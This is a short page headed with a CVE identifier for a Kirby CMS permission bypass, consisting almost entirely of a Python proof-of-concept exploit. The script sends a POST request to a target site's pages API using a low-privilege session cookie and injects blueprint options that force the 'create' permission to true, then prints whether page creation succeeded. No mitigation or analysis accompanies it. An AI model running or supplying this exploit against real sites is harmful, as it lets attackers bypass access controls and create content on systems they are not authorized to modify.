CVE-2026-41325 Kirby CMS权限绕过漏洞

import requests # Target vulnerable Kirby CMS instance target_url = "http://target-site.com/api/pages" # Attacker's session with low privileges cookies = { "kirby_session": "low_privilege_session_token" } # Malicious payload injecting blueprint options to override permissions # This payload attempts to force the 'create' option to true payload = { "title": "Malicious Page", "blueprint": { "options": { "create": True # Override permission check } } } try: response = requests.post(target_url, json=payload, cookies=cookies) if response.status_code == 200: print("Exploit successful: Page created despite insufficient permissions.") else: print(f"Exploit failed: Status code {response.status_code}") except Exception as e: print(f"An error occurred: {e}")